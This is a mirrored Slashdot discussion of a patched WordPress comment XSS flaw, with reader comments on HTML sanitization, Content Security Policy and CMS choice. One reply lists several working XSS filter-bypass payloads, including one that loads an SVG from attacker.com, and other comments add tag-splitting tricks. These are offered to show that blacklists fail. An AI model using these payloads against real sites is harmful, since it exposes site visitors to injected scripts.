Slashdot Mirror

← Back to Stories (view on slashdot.org)

Critical XSS Flaws Patched In WordPress and Popular Plug-In

Posted by timothy on from the switch-to-slashcode dept.

itwbennett writes The WordPress development team on Thursday released critical security updates that address an XSS vulnerability in the comment boxes of WordPress posts and pages. An attacker could exploit this flaw to create comments with malicious JavaScript code embedded in them that would get executed by the browsers of users seeing those comments. 'In the most obvious scenario the attacker leaves a comment containing the JavaScript and some links in order to put the comment in the moderation queue,' said Jouko Pynnonen, the security researcher who found the flaw.

41 comments

  1. See? by Anonymous Coward · · Score: 0

    This is why Slashdot shouldn't use unicode...

  2. Regular expressions by GeLeTo · · Score: 1, Insightful

    Sanitizing HTML input with regular expressions, what could possibly go wrong?

    1. Re:Regular expressions by davester666 · · Score: 1

      They should dump html, skip Javascript, and just jump to accepting comments written in Go.

      --
      Sleep your way to a whiter smile...date a dentist!
    2. Re:Regular expressions by x0ra · · Score: 1

      Do you have a better solution ?

      Editing a mixup of text & html is rather inconvenient. I used to parse a web page using sed(1) after a pre-processing with tidy, but given the difficulty to constantly adapt to change of formatting and constantly changing tag, I had to resort to use XSLT. Though, it is not a perfect solution either when the input is not properly structured. Right now, I'm extracting part of the content with good old regex, and doing the finer work with XSLT.

    3. Re:Regular expressions by ls671 · · Score: 1

      Running wp without at least a WAF in front of it, what could possibly go wrong?

      --
      Everything I write is lies, read between the lines.
    4. Re:Regular expressions by Spy+Handler · · Score: 2

      Wouldn't simply stripping out "
      Like, whatever the user posted doesn't have to look properly formatted or anything, he's trying to inject malicious javascript... the Wordpress site owner will be deleting the comment as soon as it's discovered, right?

    5. Re: Regular expressions by GeLeTo · · Score: 1

      Use a proper HTML sanitizer. Yes, this is much bulkier than just throwing a regexp, but this is for a reason. Just look at the security advisories for google caja for instance: https://code.google.com/p/goog...
      There's no way a simple regex can take care of all these cases, if WP just updated the regex - it is bound to be full of holes.

    6. Re: Regular expressions by GeLeTo · · Score: 1

      No, you have complex escape sequences, encoding tricks, browsers interpreting invalid HTML differently... This is much more complex than it looks.

    7. Re: Regular expressions by x0ra · · Score: 1

      By your standards I wouldn't trust Google Caja... there has been a lot of security vulnerabilities in the past years as well...

    8. Re: Regular expressions by TheLink · · Score: 1

      Many of these exploits and xss-worms would not have been effective if people had implemented the suggestion I made more than a decade ago:
      http://osdir.com/ml/mozilla.se...
      http://osdir.com/ml/security.w...
      http://lists.w3.org/Archives/P...

      Plenty of people suggest libraries to sanitize stuff, but when people keep creating new "GO" buttons and never a single "STOP" button - how can you be sure you've disabled every possible "GO" button? With my proposal, a "STOP button" could even disable future yet to be invented "GO" buttons.

      Anyway since the Mozilla bunch supposedly have a better idea, how about getting on with it: https://developer.mozilla.org/...

      --
    9. Re:Regular expressions by x0ra · · Score: 1

      If the purpose of the XSS is to create a second admin account, all it takes is for the owner to consult the comment ...

    10. Re: Regular expressions by Anonymous Coward · · Score: 0

      You might be interested in this: http://www.html5rocks.com/en/tutorials/security/sandboxed-iframes/

    11. Re: Regular expressions by Anonymous Coward · · Score: 0

      That's what the last link in the post is about.

    12. Re: Regular expressions by cbhacking · · Score: 1

      Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

      Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

      With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There's many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

      --
      There's no place I could be, since I've found Serenity...
    13. Re:Regular expressions by cbhacking · · Score: 4, Interesting

      <img src="xss" onerror="alert('Nope!')" />
      <iframe src="javascript:alert('That won't work.')"></iframe>
      <object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
      <scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
      <form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
      <h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

      People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

      --
      There's no place I could be, since I've found Serenity...
    14. Re: Regular expressions by Anonymous Coward · · Score: 0

      Noo, please read the full patagraph. Its like "CSP is good. BUT sandboxed iframes are better." you only read that first sentence, and thought the article was about CSP.

    15. Re:Regular expressions by Bigbutt · · Score: 1

      Yep. I have to approve all comments.

      [John]

      --
      Shit better not happen!
    16. Re:Regular expressions by ArsonSmith · · Score: 1

      https://www.youtube.com/watch?...

      --
      Paying taxes to buy civilization is like paying a hooker to buy love.
    17. Re:Regular expressions by Anonymous Coward · · Score: 0

      The basic problem is that WordPress is written in PHP and blacklisting (especially using regular expressions) is very deeply entrenched in the PHP community. (I should know, I used to do PHP web development until had to quit to regain my sanity.)

      The cause behind this is twofold:

      1) The PHP language itself isn't big on making it easy to properly encode text. In addition, PHP makes it very, very easy to implement basic blacklisting, especially using regular expressions. The thing is, most developers learn more from the language and framework in which they're developing than they ever learn at university. So if the language is bad, you'll get bad developers.

      2) The PHP community is very resistant to change and very defensive about well-deserved criticism. If you visit PHP forums and such on the internet, like I used to do, you get the feeling that you're inside a combination of a fortress and an echo-chamber. This means that good ideas from outside the PHP community tend not to enter it, and it also means that PHP developers are to a large extent taught by other PHP developers, who tend to be the worst teachers because they're PHP developers.

      If I could ban PHP, I would.

    18. Re:Regular expressions by Anonymous Coward · · Score: 0

      Just for reference, there are some of us do who employ proper parameter validation and white-listing, filtering of all incoming and outgoing data, including escaping any and all output. While still using PHP.

      But I agree. More should do so.

  3. Kinda like bailing in a sinking ship by Anonymous Coward · · Score: 0

    Follow the rats!

  4. Just too bad by Anonymous Coward · · Score: 0

    that this "security researcher"'s website doesn't render and doesn't do graceful degradation.

  5. There's a solution by Anonymous Coward · · Score: 0

    Why isn't everybody just running Slashcode? Would it be because the messaging system gets borked occasionally?

    Hiiiii, can you fix please?

    1. Re:There's a solution by Dracos · · Score: 2

      The real question is, Why is anybody still runing WordPress?

    2. Re:There's a solution by drinkypoo · · Score: 3, Insightful

      The real question is, Why is anybody still runing WordPress?

      Because Drupal has security flaws, too.

      Not everyone wants to write their own CMS and deal with the security issues. Wordpress probably is the absolutely worst choice, though.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    3. Re:There's a solution by Zedrick · · Score: 4, Insightful

      Because it's very easy to use for people with their own domain but little tech knowledge, it has a massive amount of themes and plugins to choose from (which I admit can be a problem) and it has much less security issues than any comparable CMS.

      I've worked with hosting abuse for a long time, and it's fairly rare to see a hacked WP nowadays - unless the owner of the site has turned off auto-updating. Hacked Joomla-, modX- or Drupal-sites are much more common.

    4. Re:There's a solution by XXeR · · Score: 1

      The real question is, Why is anybody still runing WordPress?

      Yeah, nearly a quarter of the Internet runs it...what imbeciles!

      http://w3techs.com/technologie...

    5. Re:There's a solution by Bigbutt · · Score: 1

      Why not? I'm using it for a couple of my sites. Comments must be approved by me and I've locked down access to the admin directory to only accept logins from my home machine.

      Instead of saying "Why?", provide suggestions as to a good replacement.

      "WordPress has so many security holes mostly due to unsecure themes and plugins. Why not use Drupal or at least make sure you follow these steps to secure your site."

      It's just annoying to hear "what a piece of shit, what idiot uses [whatever you don't particularly like]?" Folks like me will simply disregard your comment as unhelpful and continue using whatever software (or Wine or Whiskey or Car or Programming Language or Beer or Blog Software or Linux distro (or BSD distro)) you don't particularly like.

      [John]

      --
      Shit better not happen!
  6. That's why pages should be usable without js by Anonymous Coward · · Score: 1

    This is an appeal to all Web site designers.

    Instead of scrambling to plug each hole, allow your users to protect themselves by browsing scriptless (and for another reason: cookieless).

    I mean: do degrade the bling-bling, but degrade *gracefully*.

    I browse scriptless (and for the most part cookieless) and from time to time stumble upon pages which turn up blank when Javascript is disabled. Those come into my blacklist (perhaps, one day I'll publish that blacklist).

    1. Re:That's why pages should be usable without js by Anonymous Coward · · Score: 1

      I make all my websites work without javascript first, and then add the bling bling where needed.

      In my experience, degrading gracefully is much harder to do than adding javascript functionality later. Given that you do design the javascript systems before hand and not just do an afterthought (that leads to a mess and hacking the existing code).

    2. Re:That's why pages should be usable without js by Anonymous Coward · · Score: 0

      > I make all my websites work without javascript first

      Good for you. Thank you for that.

      > In my experience, degrading gracefully is much hardeer to do than adding javascript functionality later

      Got that. Seems I expressed myself ambiguously: by "degrading gracefully" I rather meant that the page falls back to sensible behaviour when js is missing -- regardless of the design process which lead to said page. Writing clearly is hard, sorry for that.

  7. To quote QDB... by canadiannomad · · Score: 0

    WordPress is an unauthenticated remote shell that, as a useful side feature, also contains a blog.

    --
    Hmm, the humour and sarcasm seem to have been be lost on you.
  8. some good PHP-based libraries like htmlawed by Anonymous Coward · · Score: 0

    There are some good PHP-based libraries like htmLawed to protect against such issues.

  9. Attackers take control of websites? by lippydude · · Score: 1

    "New security updates released for the WordPress .. fix cross-site scripting (XSS) vulnerabilities that could allow attackers to take control of websites ."

    Embedded javascript in a comment box could trigger exploits on Microsoft Internet Explorer running on Microsoft Windows desktops.

    1. Re:Attackers take control of websites? by benjymouse · · Score: 1

      "New security updates released for the WordPress .. fix cross-site scripting (XSS) vulnerabilities that could allow attackers to take control of websites ."

      Embedded javascript in a comment box could trigger exploits on Microsoft Internet Explorer running on Microsoft Windows desktops.

      Source? Or just trolling?

      --
      Reading slashdot one-liner: (irm http://rss.slashdot.org/Slashdot/slashdot).rdf.item | fl title,desc*
  10. Content Security Policy by Njovich · · Score: 2

    One highly underused technology is the Content Security Policy. It is supported in all major browsers, including IE10+.

    With simple headers you can prevent anyone from using inline javascript or including scripts from non-whitelisted domains. For instance, the following headers would make inline scripts not execute, and only execute javascript from the whitelisted domains:

    Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;
    X-Content-Security-Policy: script-src 'self' www.google-analytics.com ajax.googleapis.com;

    If projects like Wordpress would pick this up, it would make it very difficult to do XSS attacks.

  11. onload, scrscriptipt by raymorris · · Score: 1

    onLoad=(yourscrewed)

    No script tag there.

    How about if I enter scrscriptipt? When you remove "script" from the middle, you end up with - script.

    Removing stuff will pretty much never work. You have to htmlencode the output.

  12. wait a minute... by slashmydots · · Score: 1

    Do you mean to tell me that running overcomplicated garbage code on 10 million websites that uses 15 divs and 3 databases to draw the word "the" on the page might be vulnerable to cross site scripting? I never would have guessed! (I'm a by-hand HTML designer by the way).

    1. Re:wait a minute... by Anonymous Coward · · Score: 0

      (I'm a by-hand HTML designer by the way)

      "I write ugly and unusable crap, but at least I write it really slowly!"

    2. Re:wait a minute... by Anonymous Coward · · Score: 0

      (I'm a by-hand HTML designer by the way)

      "I write ugly and unusable crap, but at least I write it really slowly!"

      "that renders exactly the same on every browser... and not because a CMS implemented a bunch of compatibility hacks, but because it can completely avoid incompatibilities because there are no dependancies."

      "right" is subjective.